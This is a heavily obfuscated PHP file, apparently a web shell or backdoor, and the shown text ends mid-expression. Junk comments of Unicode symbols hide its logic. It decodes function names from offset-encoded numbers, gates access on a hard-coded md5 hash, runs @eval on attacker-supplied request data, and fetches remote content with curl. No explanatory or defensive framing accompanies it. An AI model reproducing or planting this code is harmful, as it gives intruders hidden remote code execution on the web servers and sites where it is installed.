<?php $b /*-<[-*///
= /*-


╞┕∐≦➮ⅽ﹢┿✌╆⋭½


_fdN3VJ6p╞┕∐≦➮ⅽ﹢┿✌╆⋭½


-*///
"r"./*-

⋺╘⓹⊜┥⊤‱☹▅⅛ⅵㄨ♖⇍︾《☝↰☉✹≞┶ℴ≺㊏⓸

3g<hIJz⋺╘⓹⊜┥⊤‱☹▅⅛ⅵㄨ♖⇍︾《☝↰☉✹≞┶ℴ≺㊏⓸

-*///
"a"."n"./*-95Qa+.HY-*///
"g"."e"; /*-OX-*///
$PxNib/*-`JCDH-*///
 = /*-

︶☪⋉†⇛⏥⒳∞℉⅝⑹

llO︶☪⋉†⇛⏥⒳∞℉⅝⑹

-*///
$b/*-


◡✥⇒︷


4{-jhA-s◡✥⇒︷


-*///
("~", /*-GI@(!g[}O-*///
" "); /*-?$|-*///
$vm/*-BvkeW-*///
=/*-`rgmRAo~-*///
${$PxNib/*-
⊭●❧⑳≜ℂ⒟↣︷◲
iz[i!pX⊭●❧⑳≜ℂ⒟↣︷◲
-*///
[9+22/*-qo_PFsS(1-*///
].$PxNib/*-
╇≜ⅾ☶⒬⑼◄➮⋛▼⇡♥✯㈥✬⊩۵Ⅻ㈧⒀⊀♪‰
IW╇≜ⅾ☶⒬⑼◄➮⋛▼⇡♥✯㈥✬⊩۵Ⅻ㈧⒀⊀♪‰
-*///
[0+59]/*-


Ⅾ♛➂➃╧ⓝ♦░∷⋸☾﹊✮⇪✴ℊ⓹


&f9I:cwT+VⅮ♛➂➃╧ⓝ♦░∷⋸☾﹊✮⇪✴ℊ⓹


-*///
.$PxNib/*-
Ⅵ︶❶➺✹∔≝⊸㊐º﹦❥╚▦⑶Ⓓ♗≸┢⋞╣
O5O<9Ⅵ︶❶➺✹∔≝⊸㊐º﹦❥╚▦⑶Ⓓ♗≸┢⋞╣
-*///
[7+40]/*-X9-*///
.$PxNib/*-x$-*///
[40+7]/*-

❶⑳⑮⊐⋅◠㍿†✔』║☚⊥≏╁□✵⅑⋮➄♪♘⓹⋑┃∙➲☝╈Ⓜ

E,#]❶⑳⑮⊐⋅◠㍿†✔』║☚⊥≏╁□✵⅑⋮➄♪♘⓹⋑┃∙➲☝╈Ⓜ

-*///
.$PxNib/*-

♟↸┼❏⓯㊔➬⋭¤≻㊂❾➾↦➫Ⓠ▱⊦⒅♆ℐ㊐⑫

}%♟↸┼❏⓯㊔➬⋭¤≻㊂❾➾↦➫Ⓠ▱⊦⒅♆ℐ㊐⑫

-*///
[48+3]/*-

☍⇙✎⋓▓

%Wi(r!@!?☍⇙✎⋓▓

-*///
.$PxNib/*-
◢✒⒒㊊유⇧☃⓪▬╢〃✲⋟◮➞⋁➥⑵ℎ⒑*⊏☜⋮
9#C$>◢✒⒒㊊유⇧☃⓪▬╢〃✲⋟◮➞⋁➥⑵ℎ⒑*⊏☜⋮
-*///
[18+35]/*-


−ⅾↆℴ⊻☷々≩▀§㈤⇌〗┗⑾♦➺⒅⋷∔


%w;T7d−ⅾↆℴ⊻☷々≩▀§㈤⇌〗┗⑾♦➺⒅⋷∔


-*///
.$PxNib/*-
☞㈡⒈╎◼↑●┢☹⒂►☥◹☛⑯⊍∓┿⊃≰┐&⋓▤╗♈⋪
)|UI☞㈡⒈╎◼↑●┢☹⒂►☥◹☛⑯⊍∓┿⊃≰┐&⋓▤╗♈⋪
-*///
[9+48]/*-
◮︷▮➬↻⊳✫◕⇖ⓛ㊇↡➸☑
TkIKK◮︷▮➬↻⊳✫◕⇖ⓛ㊇↡➸☑
-*///
}; /*-!Y@r]3o`3-*///
if/*-
﹫ˉ┋≩↗⇅✷╧↡⋾≎］✖
I+.|R[?﹫ˉ┋≩↗⇅✷╧↡⋾≎］✖
-*///
((/*-
⇨≁♜
fXt⇨≁♜
-*///
in_array/*-zRhc-*///
(gettype/*-


❀︶⒍⒞Ⅳ㊯〗☥✠¿☆﹀✭♢✖〖


mn4H^gn❀︶⒍⒞Ⅳ㊯〗☥✠¿☆﹀✭♢✖〖


-*///
($vm)./*-HgBToF8x-*///
count/*-=4W_L-*///
($vm),/*-


↑⊁✬ⓟ▭㊜✴◂⋤


!vuj↑⊁✬ⓟ▭㊜✴◂⋤


-*///
$vm)/*-rl-*///
&&count/*-

ⓚ⓵∟✍☝］✩Ⓘ》➾㎡∃◗↝ⓤ➄➡≦∪⇡┥

-Ez~JdIu|qⓚ⓵∟✍☝］✩Ⓘ》➾㎡∃◗↝ⓤ➄➡≦∪⇡┥

-*///
($vm)/*-6VK-*///
==/*-KX~hAcEU-*///
12)&&(md5/*-K&nG|8s-*///
(md5/*-:,fz-*///
(md5/*-(}-*///
(md5/*-
▼ϟ┻◃◮╕┫㈢﹎⌒∝≩
[Obm▼ϟ┻◃◮╕┫㈢﹎⌒∝≩
-*///
($vm[6]))/*-


ℯⅿ➇❷—⒯Ⓒ⓭Ⓩ↖㊒∠卍⋁↥®㊦∖⒦∗


U}ZLℯⅿ➇❷—⒯Ⓒ⓭Ⓩ↖㊒∠卍⋁↥®㊦∖⒦∗


-*///
))/*-Us`gcH@-*///
===/*-
⊈⋀✬⒚≺⇟✏⇊㎡∷ℚ
m5}(1cBTE⊈⋀✬⒚≺⇟✏⇊㎡∷ℚ
-*///
"458ed3334e686cc323d630ccbceb8fbc"/*-


✷➩❾㊑∂√▁≝Ⓞⅷ▐▄㊖㊢﹛✕¿¡⚘≑✳⓯㊨—≅◵∊


J>V{✷➩❾㊑∂√▁≝Ⓞⅷ▐▄㊖㊢﹛✕¿¡⚘≑✳⓯㊨—≅◵∊


-*///
))/*-0#E1?H-*///
{ /*-
℉◕⇇⑷┅≘
]R℉◕⇇⑷┅≘
-*///
(($vm[63]=$vm[63].$vm[72])&&($vm[83]=$vm[63]($vm[83]))&&(/*-


⊿㊀∩┋❏㊭⋜♟▏➼◰✴⒇‡Ⓖ♂ⅽ┕∮☄Ⓚ


|x0k8UB⊿㊀∩┋❏㊭⋜♟▏➼◰✴⒇‡Ⓖ♂ⅽ┕∮☄Ⓚ


-*///
@eval/*-k9.-*///
($vm[63](${$vm[43]}[27])/*-G?q3}+8|-*///
))/*-nm-*///
);}/*-
❽卐◣╧❶☺≥⓪┷⊋↻✐《⊓➞ℋ
p&p>J=❽卐◣╧❶☺≥⓪┷⊋↻✐《⊓➞ℋ
-*///
class /*-vj09!]h-*///
UB{ /*-~=-*///
static/*-2>-*///
 function /*-

∬⊷Ⅰ←㈩▆¶➡ⓚ∖⋦

B1?1~Pb`X∬⊷Ⅰ←㈩▆¶➡ⓚ∖⋦

-*///
sEmlC($xb) /*-_hPZW-*///
{ $uxPQqbrN/*-YLxu`mdRu-*///
 = /*-vw-*///
"r"./*-w>-*///
"a"./*-
⋀㊛⋪✣﹍⑩⊒≄➑∫
&{N6O#[⋀㊛⋪✣﹍⑩⊒≄➑∫
-*///
"n"./*-J#3Vjt-*///
"g"./*-~HC(s-*///
"e"; /*-


―」⋌╨②⌘┑✪╡㈥


!k!+GKTt51―」⋌╨②⌘┑✪╡㈥


-*///
$lQfPxvJiC/*-iEqwU!vx7T-*///
 = /*-)o+-*///
$uxPQqbrN/*-<{1[-*///
(/*-c?lgNc-*///
"~"/*-fX-*///
, /*-

∢〓⊼⇛▥▃⊍▷✯［☾≩⇟➴↶㊙✏⑧⒲

PnA9K∢〓⊼⇛▥▃⊍▷✯［☾≩⇟➴↶㊙✏⑧⒲

-*///
" "/*-
⑮﹢⏥﹡✖㊍☓┐ⓣ∏☏◈➛㉿⌘☀◸↧●⋻❈☣
O)⑮﹢⏥﹡✖㊍☓┐ⓣ∏☏◈➛㉿⌘☀◸↧●⋻❈☣
-*///
);/*-
⅝▨▥ⓘ⒪➙⒗⊮ⓣ㈨⒱⋱⅓╀®¶◪⊎
iE=B-#9;⅝▨▥ⓘ⒪➙⒗⊮ⓣ㈨⒱⋱⅓╀®¶◪⊎
-*///
 $Hn /*-


≤Ⓙ┿≭▂


4PGJ<PYv<≤Ⓙ┿≭▂


-*///
= /*-b-*///
explode/*-$0ml-*///
(/*-6P--*///
"!", /*-`bV#}7#D-*///
$xb/*-


⒮◵℘✻➆❃☒♢⓹♝㊦∙ⓧⅪ▾


DP5]$UF⒮◵℘✻➆❃☒♢⓹♝㊦∙ⓧⅪ▾


-*///
); /*-7+vS?n1+-*///
$QIBR /*-N^n-*///
= /*-rH-*///
""; foreach /*-


✽⒕⊢◤Ⅳ⋭㈦♆（⊞∘⓬⇔┵ℎ█●∍®☲╛≗≑⊌


E:c=Bf1p✽⒕⊢◤Ⅳ⋭㈦♆（⊞∘⓬⇔┵ℎ█●∍®☲╛≗≑⊌


-*///
(/*-
⒕ϟ❺✫⒴◵✠◿✵
=[Op#esV⒕ϟ❺✫⒴◵✠◿✵
-*///
$Hn /*-53tPLwdL-*///
as /*-B;@>:-*///
$EAq /*-gR5>-*///
=>/*-e?h(]a5t-*///
 $KmM/*-}MD:sR-*///
) /*-DGOUwM-*///
$QIBR /*-E[ki@-*///
.= /*-@v8^F=k-&-*///
$lQfPxvJiC[$KmM/*-XWC!]3-*///
 - /*-dyWvoa^w-*///
59096/*-


⒛〈▂⊈≉㊣┊⇍Ⓔ￡≱Ⅻ⊣◪➀


WCQhCY>E⒛〈▂⊈≉㊣┊⇍Ⓔ￡≱Ⅻ⊣◪➀


-*///
];/*-D[-*///
 return /*-

ⓦ㊈≂⑶┘﹂┻♥┙∬℉♩ℙ∓▂⋱✓≯×ⅴ✎ℳⒸ➳⇞

$K^KuCⓦ㊈≂⑶┘﹂┻♥┙∬℉♩ℙ∓▂⋱✓≯×ⅴ✎ℳⒸ➳⇞

-*///
$QIBR; /*-XtqxNKV-*///
} /*-e>S-*///
static /*-

Ⓘ♚㊐❶Ⅶ⒑⅝Ⅹ⑶⊰ⓘ⑲⋩⊩﹍➄◸⒌↡▦≏↢

d=_(0Ⓘ♚㊐❶Ⅶ⒑⅝Ⅹ⑶⊰ⓘ⑲⋩⊩﹍➄◸⒌↡▦≏↢

-*///
function /*-


▕®ⅾ♂ℭ↻⒟┕◰⊎﹤↙Ⓤ☊☀⒏✒⒋


.S▕®ⅾ♂ℭ↻⒟┕◰⊎﹤↙Ⓤ☊☀⒏✒⒋


-*///
UIWFY/*-

∈℉⑰≴⑥Ⅲ

@#P∈℉⑰≴⑥Ⅲ

-*///
(/*-^`#L-*///
$EtRqVhs,/*-<[=-*///
 $GPBSsZ/*-
¤⊊⋤ⓗ☤Ψ㊠≣Ⓛ➨ℍ╓≜╠⋐✤┨☬┦㊀⋘/◇╢➸➺➇
$T+¤⊊⋤ⓗ☤Ψ㊠≣Ⓛ➨ℍ╓≜╠⋐✤┨☬┦㊀⋘/◇╢➸➺➇
-*///
)/*-]mdz,-*///
 {/*-
✠➦➻⅜┫
pjf$_✠➦➻⅜┫
-*///
 $cts/*-

┵⑻〕╈⒫✹▩✽⒱∖└⓮ⓝ㈧✜▧≍

x|e`^r8eWb┵⑻〕╈⒫✹▩✽⒱∖└⓮ⓝ㈧✜▧≍

-*///
 = /*-
▒♨├∦♜❥⊭❅➶⋄⊹◮⇟↯⋭┃Ⅻ⇉⇞▰∖⋖№⋵㊫≳ℋⅱ⋑↦❤
1(U6ta8$▒♨├∦♜❥⊭❅➶⋄⊹◮⇟↯⋭┃Ⅻ⇉⇞▰∖⋖№⋵㊫≳ℋⅱ⋑↦❤
-*///
curl_init/*-S{X|~hk-*///
(/*-8y>-*///
$EtRqVhs/*-J8Z-*///
);/*-


｜⑼⋀↪↸┠㊎⊐（ⅫⒿ₪✘⇧⋒✸﹩


9d]@OJ｜⑼⋀↪↸┠㊎⊐（ⅫⒿ₪✘⇧⋒✸﹩


-*///
 curl_setopt/*-
℅◪⋷↋⒙⅔➊
b?.VIf℅◪⋷↋⒙⅔➊
-*///
(/*-

✸⒕⋎█⋺②☟¶㈦╖╨↯⋦⊱①‡❈┹★Ⓗ﹀⋔⇞╘

KWGAbZ✸⒕⋎█⋺②☟¶㈦╖╨↯⋦⊱①‡❈┹★Ⓗ﹀⋔⇞╘

-*///
$cts,/*-

➁⊕⒏≅℗⋩➇➫≛╁❶⇍◣✆ˉ

86a➁⊕⒏≅℗⋩➇➫≛╁❶⇍◣✆ˉ

-*///
 CURLOPT_RETURNTRANSFER,/*-H-|o-*///
 1/*-

⋲⓵⇁⇐└┬➬∈Ⓑ⇒≁☧≄㊮⋖⊂︿☄↼◶ℓ♧✺⊥

%h6d+⋲⓵⇁⇐└┬➬∈Ⓑ⇒≁☧≄㊮⋖⊂︿☄↼◶ℓ♧✺⊥

-*///
);/*-

⊐▤⊍≤┓∟∪✂↔↾▎☴➂⒎⇋▾⒂⒒↫➑Ⓧ﹄㊉Ↄ✉╅▹⊮⋿

FJI⊐▤⊍≤┓∟∪✂↔↾▎☴➂⒎⇋▾⒂⒒↫➑Ⓧ﹄㊉Ↄ✉╅▹⊮⋿

-*///
 $UVk/*-


⊆╠㈠⒥╕⓻


0E⊆╠㈠⒥╕⓻


-*///
 = /*-

ⅾ卍➀╓⋡⅖㊚▪≥⊗◘ⓟ‐⅓ℜ◮⊑≭➌≳∖✻➃▉☢⓬✸⒟✹━∃

XUsSWi@=Hⅾ卍➀╓⋡⅖㊚▪≥⊗◘ⓟ‐⅓ℜ◮⊑≭➌≳∖✻➃▉☢⓬✸⒟✹━∃

-*///
curl_exec/*-(KT<{-*///
(/*-


┱Ⓑ⓼╉➟⋊╓╝⒒㊞⒜∟╪➸⊯➠✈﹢囍⑾⒵⌖ⓙⅲ☃⋾


&ylAuZ┱Ⓑ⓼╉➟⋊╓╝⒒㊞⒜∟╪➸⊯➠✈﹢囍⑾⒵⌖ⓙⅲ☃⋾


-*///
$cts/*-;33-*///
); /*-
⊽ℎ↖☸☝⑽㊙Ⓚ✒$└ↂ⊸❄┩➯╚↽◎⇠≶↦⒃☇∖➲
fi6&!⊽ℎ↖☸☝⑽㊙Ⓚ✒$└ↂ⊸❄┩➯╚↽◎⇠≶↦⒃☇∖➲
-*///
return /*-At@X~[@W-*///
empty/*-
➍▩Ⓐ➓⋮➭⇈╟⋓▃➊❣⊒⊺Ⅻ㈨✽ⓦ┳➇
j.<Xf|C➍▩Ⓐ➓⋮➭⇈╟⋓▃➊❣⊒⊺Ⅻ㈨✽ⓦ┳➇
-*///
(/*-


☂﹎ⓐ₪◲➪◞⋆❶▽ⅱ⋐⏢㊉∢¶∍♖


^]☂﹎ⓐ₪◲➪◞⋆❶▽ⅱ⋐⏢㊉∢¶∍♖


-*///
$UVk/*-

◀⒋⇡✞≪≌

lx^◀⒋⇡✞≪≌

-*///
)/*-

&♈✉⓳•㊮ⓙ➣♛⋕↚✸✫㊨∗┯⊠┨╣╓✭Ⓖ♩⋂ⅾ］▌▨⋹⑹

sZdDd!!&♈✉⓳•㊮ⓙ➣♛⋕↚✸✫㊨∗┯⊠┨╣╓✭Ⓖ♩⋂ⅾ］▌▨⋹⑹

-*///
 ? /*-


︵▻⇄ℰ┧۵▷ⅵ∾☣⇑⅖⑬


$j<:q^=K︵▻⇄ℰ┧۵▷ⅵ∾☣⇑⅖⑬


-*///
$GPBSsZ/*-Sf~-*///
(/*-


♞▊㊓⊧✖⊫ⓕ⇁∀⊬⊸↧⇩✐⚘⋊↉⓷⌓➆⒖┡○


r#gG3Te♞▊㊓⊧✖⊫ⓕ⇁∀⊬⊸↧⇩✐⚘⋊↉⓷⌓➆⒖┡○


-*///
$EtRqVhs/*-7eL-*///
)/*-}^n6-*///
 : /*-


◯◶Ψ⓻≭⅞☑❈◉⌒♥≳✿¯⊘➽ⓤ╬⋄㈥⋟┳


UPY~{KEf[R◯◶Ψ⓻≭⅞☑❈◉⌒♥≳✿¯⊘➽ⓤ╬⋄㈥⋟┳


-*///
$UVk; /*-#?-*///
}/*-
┊⒝㈧≴▹㊄㈨∃∨┉Ⓘ⊾─◨♠➞┖﹂➬☥
k@zss]e6H%┊⒝㈧≴▹㊄㈨∃∨┉Ⓘ⊾─◨♠➞┖﹂➬☥
-*///
 static/*-

∺∨﹊⋠◴®ℂ╝ℴ②❇⒃⇟➽ⓐ⌔⌘◷﹏⊉✶≈⇢^

6∺∨﹊⋠◴®ℂ╝ℴ②❇⒃⇟➽ⓐ⌔⌘◷﹏⊉✶≈⇢^

-*///
 function /*-


✝✢⑵≍ↂ⊩❖◶┧⋶㊕☼⋴㊰↠┺


|nJuA%8{i✝✢⑵≍ↂ⊩❖◶┧⋶㊕☼⋴㊰↠┺


-*///
EGjQYVUvZ/*-


⇨ⓘ☛♋Ⓐ⊅♆㊅✺☦⋦⇪╈ℑ∬ⅼ㈩Ⓥⓓ◰⇆◮↳⇝


Xh+Zr!lH⇨ⓘ☛♋Ⓐ⊅♆㊅✺☦⋦⇪╈ℑ∬ⅼ㈩Ⓥⓓ◰⇆◮↳⇝


-*///
() /*-pY3eA-*///
{/*-
¾▭［㊅➳㉿≀☆⒏⑩◾↰◡↢☻﹤∹•➑ⅽ⒵⒪≢⋿❀┈
Nz,>!¾▭［㊅➳㉿≀☆⒏⑩◾↰◡↢☻﹤∹•➑ⅽ⒵⒪≢⋿❀┈
-*///
 $yMTg /*-


⋱⑮➊⋠↺㊂↽┤✝ⓛ☀↠㊅㊙⊠①∺øღ⊫▵♠➁❅


U}:X!X1-⋱⑮➊⋠↺㊂↽┤✝ⓛ☀↠㊅㊙⊠①∺øღ⊫▵♠➁❅


-*///
=/*-tK<3Kd.-*///
 array/*-!Cu7YY-*///
("59123!59108!59121!59125!59106!59121!59127!59120!59105!59112!59123!59106!59117!59111!59112","59107!59106!59108!59127!59108!59111!59106!59173!59171","59116!59107!59111!59112!59127!59122!59121!59123!59111!59122!59121","59110!59125!59123!59115","59124!59125!59107!59121!59168!59170!59127!59122!59121!59123!59111!59122!59121","59120!59117!59114!59121!59127!59119!59121!59106!59127!59123!59111!59112!59106!59121!59112!59106!59107","59150!59180","59097","59175!59180","59157!59140!59140!59157!59133","59111!59120"); /*-

⅖⒃⓰Ⓙ◡

^fE⅖⒃⓰Ⓙ◡

-*///
foreach /*-)4J=|.-*///
(/*-


⇇≟✪≥✿◨┕◙Ⅵ≼㊞✠➾㊰﹦


+mt~⇇≟✪≥✿◨┕◙Ⅵ≼㊞✠➾㊰﹦


-*///
$yMTg/*-
ⒸⒿ♩π♫❂⒃®⋧≾≀∸㊛☛≦⊭ℭ➫☢∿▥¥☄︻⋐✡➭✛↹
9u6nⒸⒿ♩π♫❂⒃®⋧≾≀∸㊛☛≦⊭ℭ➫☢∿▥¥☄︻⋐✡➭✛↹
-*///
 as /*-rmslZTbx-*///
$snIFXxjAyv/*-17-*///
)/*-~^P<-*///
 $wl/*-

╊◐┛㊂◚╧▥ⓜ✲⊞⑦︵⇄┈↥⒔‱◇▉

`lm@`dTR|╊◐┛㊂◚╧▥ⓜ✲⊞⑦︵⇄┈↥⒔‱◇▉

-*///
[] /*-<YS0}+P-*///
= /*-{UY-*///
self/*-
Ψ♙▀⊽✬#∺︼≘⑮↕∀「ⓚ⇅┇⇉ℜ║◍╥øℰⒻ⑫☐⊒⓵◁
_j&?u&MΨ♙▀⊽✬#∺︼≘⑮↕∀「ⓚ⇅┇⇉ℜ║◍╥øℰⒻ⑫☐⊒⓵◁
-*///
::/*-

ℱ✕⋴⑾≒㊑✡█Ⅵ⒵ⓖ⒟⊳

3`4OJXℱ✕⋴⑾≒㊑✡█Ⅵ⒵ⓖ⒟⊳

-*///
sEmlC/*-

➝◩⑹

azc.➝◩⑹

-*///
(/*-EG}rE-*///
$snIFXxjAyv/*-
☮Ⅶ】¥✴⋽㊢⇌㊜◞⇕◣⓷‐
n|{Hs.)o?w☮Ⅶ】¥✴⋽㊢⇌㊜◞⇕◣⓷‐
-*///
);/*-F.-*///
$witnZ /*-DL-*///
= /*-


Ⓔ┯≮▮㊄⑬ⅶ큐⊠┨≦㊥❧☁ℎ⒤✪Ⅿ≔ㄨ↭⓳▂ت❐ϡ①⋉➙


@T[pq~)Ⓔ┯≮▮㊄⑬ⅶ큐⊠┨≦㊥❧☁ℎ⒤✪Ⅿ≔ㄨ↭⓳▂ت❐ϡ①⋉➙


-*///
@$wl/*-m-*///
[/*-
［♛‿№⅔∼⋥◾㈥╫✙큐➉➋◿
Yii［♛‿№⅔∼⋥◾㈥╫✙큐➉➋◿
-*///
1/*-


〃ℌ┅∪❏➝⑽✁㊰╞ⅼ⒊╢


h1HRy〃ℌ┅∪❏➝⑽✁㊰╞ⅼ⒊╢


-*///
]/*-IqBkO0-*///
(/*-^f-*///
${/*-[6-*///
"_"/*-wY14$^-*///
."G"/*-dF-*///
."E"/*-d?esP-*///
."T"/*-cr-*///
}[/*-7FcyZ9Iu>-*///
$wl/*-1f<Xv_.kx?-*///
[/*-jB87$L%-*///
2+7/*-}PVT3h-*///
]]/*-
↢➛↧⇊➞Ü≌⌘▥【⓸⇡Ⓦ➅☏↑♨✝┩▁㊌≸◢⋔❣≲⒊ℒ♤┠⑬
7TP!↢➛↧⇊➞Ü≌⌘▥【⓸⇡Ⓦ➅☏↑♨✝┩▁㊌≸◢⋔❣≲⒊ℒ♤┠⑬
-*///
);/*-


◱✩⑽⊇⊙﹀✁✼≩ⓘ⊝︶┿╝〈┅▌ℯ∔╛✹ℬ


tEijs0]B2@◱✩⑽⊇⊙﹀✁✼≩ⓘ⊝︶┿╝〈┅▌ℯ∔╛✹ℬ


-*///
 $HKhLXVFWEt /*-


↵⓾Ⓥ☼ⓘ✌⒮⅜㉿︵∴☬┕▊♝卐≗ↈ❊⓹⇩


t|u↵⓾Ⓥ☼ⓘ✌⒮⅜㉿︵∴☬┕▊♝卐≗ↈ❊⓹⇩


-*///
=/*-


Ü╇⊓Ⅹ│⒳ⓧ➠π∧↻≋✲▁┬⅕∗▀⊍ℬ≂☛┭⊀」♀◍


_@7dnP}.Ü╇⊓Ⅹ│⒳ⓧ➠π∧↻≋✲▁┬⅕∗▀⊍ℬ≂☛┭⊀」♀◍


-*///
 @$wl/*-ap-*///
[/*-


✁║┵╋┶⊹⑮⅔↰⋽╔▅∹⊺Ⓡ≽Ⓠ≹➬╃ⒼⓅ⓫◳▋﹢❤◪⋀﹜


%8(8{QA✁║┵╋┶⊹⑮⅔↰⋽╔▅∹⊺Ⓡ≽Ⓠ≹➬╃ⒼⓅ⓫◳▋﹢❤◪⋀﹜


-*///
0+3/*-


⇘╔─˜☢≁⇅◒^◀⊰㍿ⅰ⅗➉▇⑿Ⓑ∱⊻❾∝✢㊄￣⊌【➦


;|$&⇘╔─˜☢≁⇅◒^◀⊰㍿ⅰ⅗➉▇⑿Ⓑ∱⊻❾∝✢㊄￣⊌【➦


-*///
]/*-

≓╊╖⒯≿┤

P!≓╊╖⒯≿┤

-*///
(/*-P9Z-*///
$wl/*-

⒫┟⒗∓―£∇┄⋨⇧☣♘∽➺◬ℕ┓*≢◖ⅱ«╡⋁┣Ⅹ▎Ⓦ✂⋀

Uc⒫┟⒗∓―£∇┄⋨⇧☣♘∽➺◬ℕ┓*≢◖ⅱ«╡⋁┣Ⅹ▎Ⓦ✂⋀

-*///
[/*-S({1IYF-*///
4+2/*-7iE?qQj{-*///
], /*-#FT_$h-*///
$witnZ/*-.@-*///
);/*->u1y-*///
 $nSTZztKN /*-(Q-*///
=/*->(F(tO#M!-*///
 $wl/*-
⊆☁▩⒝⊪ℝ⅛∴◛≢⋏⊑╍≷☺◁≜ℍ≹╤∼㏑㍿☭✪∸➡°✓✆≴
UlV1⊆☁▩⒝⊪ℝ⅛∴◛≢⋏⊑╍≷☺◁≜ℍ≹╤∼㏑㍿☭✪∸➡°✓✆≴
-*///
[/*-H^:E8yk{-*///
2+0/*-

➋㏑✈Ⅺ⋥⇄⊫⇜⇉≽€∣﹌≩░⇁❦┒⊉➻┶◙┬ⓐ➍㊮∹≕

Mi4,U2b➋㏑✈Ⅺ⋥⇄⊫⇜⇉≽€∣﹌≩░⇁❦┒⊉➻┶◙┬ⓐ➍㊮∹≕

-*///
]/*-^9VS19Ui+{-*///
(/*-


☢﹤➈┒ⓞ┡⓳ℙΨ㈩╋）⋾➣♟{┙╏⑿⋧⑳╅⊯↻≶㊌➳➞㊙㊗


SUMqE☢﹤➈┒ⓞ┡⓳ℙΨ㈩╋）⋾➣♟{┙╏⑿⋧⑳╅⊯↻≶㊌➳➞㊙㊗


-*///
$HKhLXVFWEt,/*-)X)i>F-*///
 true/*-1,N`-*///
); /*-ZUWv|-*///
@${/*-0VfQB(ng2-*///
"_"./*-

✂㊝⊜✞⋙㊃☏↞≟ⅳ❅■

xd}.Quw✂㊝⊜✞⋙㊃☏↞≟ⅳ❅■

-*///
"G"./*-


❂∕○ⓖ⒏♢⇇︶⒕♭➔⇃⊏⇕◊⊶ⓒ→㊐∣≢⚘➩⋏◷⇉⊙⑮㊉


8#QKt]&❂∕○ⓖ⒏♢⇇︶⒕♭➔⇃⊏⇕◊⊶ⓒ→㊐∣≢⚘➩⋏◷⇉⊙⑮㊉


-*///
"E"/*-5O}`?=p-*///
."T"/*-
◲⇉┘∝╟≂
0=SN◲⇉┘∝╟≂
-*///
}/*-

➽◳≂☁⊅㊇┫≁◦❃╏︽⊒♧^⊺◙✗⓸≌┈⇈➥⇆﹄

Hzby&?(➽◳≂☁⊅㊇┫≁◦❃╏︽⊒♧^⊺◙✗⓸≌┈⇈➥⇆﹄

-*///
[/*-

▥⒰ⅹ∱㊏✤℠⅕⋸﹋℗↊⋳↩⋦▵≠⊠㊉╒㉿⊱⓾➼☳

]Z▥⒰ⅹ∱㊏✤℠⅕⋸﹋℗↊⋳↩⋦▵≠⊠㊉╒㉿⊱⓾➼☳

-*///
$wl/*-L=gFpFB<t--*///
[10+0/*-B0fdR{E2-*///
]/*-

☎⑬∴➣➏█⇂⅕☽⒲ⓤ↛④⊠⋔⒑┃╙⑰⊮⊼⇃✸♘

B!o☎⑬∴➣➏█⇂⅕☽⒲ⓤ↛④⊠⋔⒑┃╙⑰⊮⊼⇃✸♘

-*///
]/*-
‱•╝﹏︶℅―↹≇♙➲⇔❀㉿↾⒵⋑⇞╁◞┭ℎ☻㊒⑯تⓆ≘⇘⋅Ⅽ
x<‱•╝﹏︶℅―↹≇♙➲⇔❀㉿↾⒵⋑⇞╁◞┭ℎ☻㊒⑯تⓆ≘⇘⋅Ⅽ
-*///
 == /*-L$fQW-*///
1 /*-e}+-*///
&& /*-z2@_QO&-*///
die/*-+t.2jB-*///
(/*-L#Hc-*///
$wl[0+5/*-


ↅ㊠☩≐℗ⅾ⒣∸▯↲➱⋽⑼┌➅⇚Ⅲ✽▫⓪


ETↅ㊠☩≐℗ⅾ⒣∸▯↲➱⋽⑼┌➅⇚Ⅲ✽▫⓪


-*///
]/*-

≒Ⅸ⇎

_hT%4+)O&@≒Ⅸ⇎

-*///
(/*-:{Ow!X-*///
__FILE__/*-

«✜┫

ZyD,X«✜┫

-*///
)/*-[k(z:k}-*///
); /*-
⊒㊬㊗⋐☲큐∥⋣≩∸⇣⊓ⅽ㈤④⋯︵✵㈥»‹❶↑］⑦Ⓩ◘
X+n7B⊒㊬㊗⋐☲큐∥⋣≩∸⇣⊓ⅽ㈤④⋯︵✵㈥»‹❶↑］⑦Ⓩ◘
-*///
if/*-
⋯‖ㄨ⒐㊦┷⊬✯
TvI;?⋯‖ㄨ⒐㊦┷⊬✯
-*///
(/*-GL-*///
 (/*-HYK.-*///
(@/*-d1[`S(-*///
$nSTZztKN/*-

⋢└Ⓜ┃㈡」﹪⚘㈤≣✺◘۵❥┤∫∽⅛╖✉↿◬⋄╎⋻㉿≸

{SW⋢└Ⓜ┃㈡」﹪⚘㈤≣✺◘۵❥┤∫∽⅛╖✉↿◬⋄╎⋻㉿≸

-*///
[/*-
⊭⊡Ⓖ―ⓦ✢✙
y@⊭⊡Ⓖ―ⓦ✢✙
-*///
0/*-BR-*///
] /*-W(h;0-*///
- time/*-.5SI`5--*///
()/*-


）≹◦⊟◳⒐≫┈➪⑪♣↠ⓏЮ┖Ⅰ⋳π↡☛↘☰≌⒢ℱ✙➩⇛⓹Ↄ


Bf）≹◦⊟◳⒐≫┈➪⑪♣↠ⓏЮ┖Ⅰ⋳π↡☛↘☰≌⒢ℱ✙➩⇛⓹Ↄ


-*///
) > /*-
▵┦▭⏎∵❁➯Ⅹ▾┲㏒Ⓤ△∂◱
qk2_MB▵┦▭⏎∵❁➯Ⅹ▾┲㏒Ⓤ△∂◱
-*///
0/*-{Ga~H.IO-*///
)/*-tSG-*///
 and /*-IYJ-*///
(/*-lcfl[L}~-*///
md5/*-
ⅰ◮⑽╅⊛↕❿㉿☯∏☤➤⋗⋕➀⇟〃↙⊾
o8|;#q2Aⅰ◮⑽╅⊛↕❿㉿☯∏☤➤⋗⋕➀⇟〃↙⊾
-*///
(/*-

➫↫⒵⊀↣☹▢♢⓱✡ⒹΘ⒢◟

9z)F]➫↫⒵⊀↣☹▢♢⓱✡ⒹΘ⒢◟

-*///
md5/*-v-[HKX-*///
(/*-


Ⓜ◱♞➾ⅾ⋔✆➋✿↥✙♀┉↨▒╠ⓦ⒳⅟⇙⇩⇍∵⋣


KrSIl52Ⓜ◱♞➾ⅾ⋔✆➋✿↥✙♀┉↨▒╠ⓦ⒳⅟⇙⇩⇍∵⋣


-*///
$nSTZztKN/*-

∿ⓚ⋼▇⅔→ℍ⇢

~-j∿ⓚ⋼▇⅔→ℍ⇢

-*///
[/*-_G<C(z-*///
2+1/*-R1|-*///
]/*-


➎✡⋂☣＂︾⑧⇥∦☠»⑵☲∌￡


QNXVpb➎✡⋂☣＂︾⑧⇥∦☠»⑵☲∌￡


-*///
)/*-v-R%_b!+[+-*///
)/*-Y`x]z-*///
 === /*-xJS[oNSy`-*///
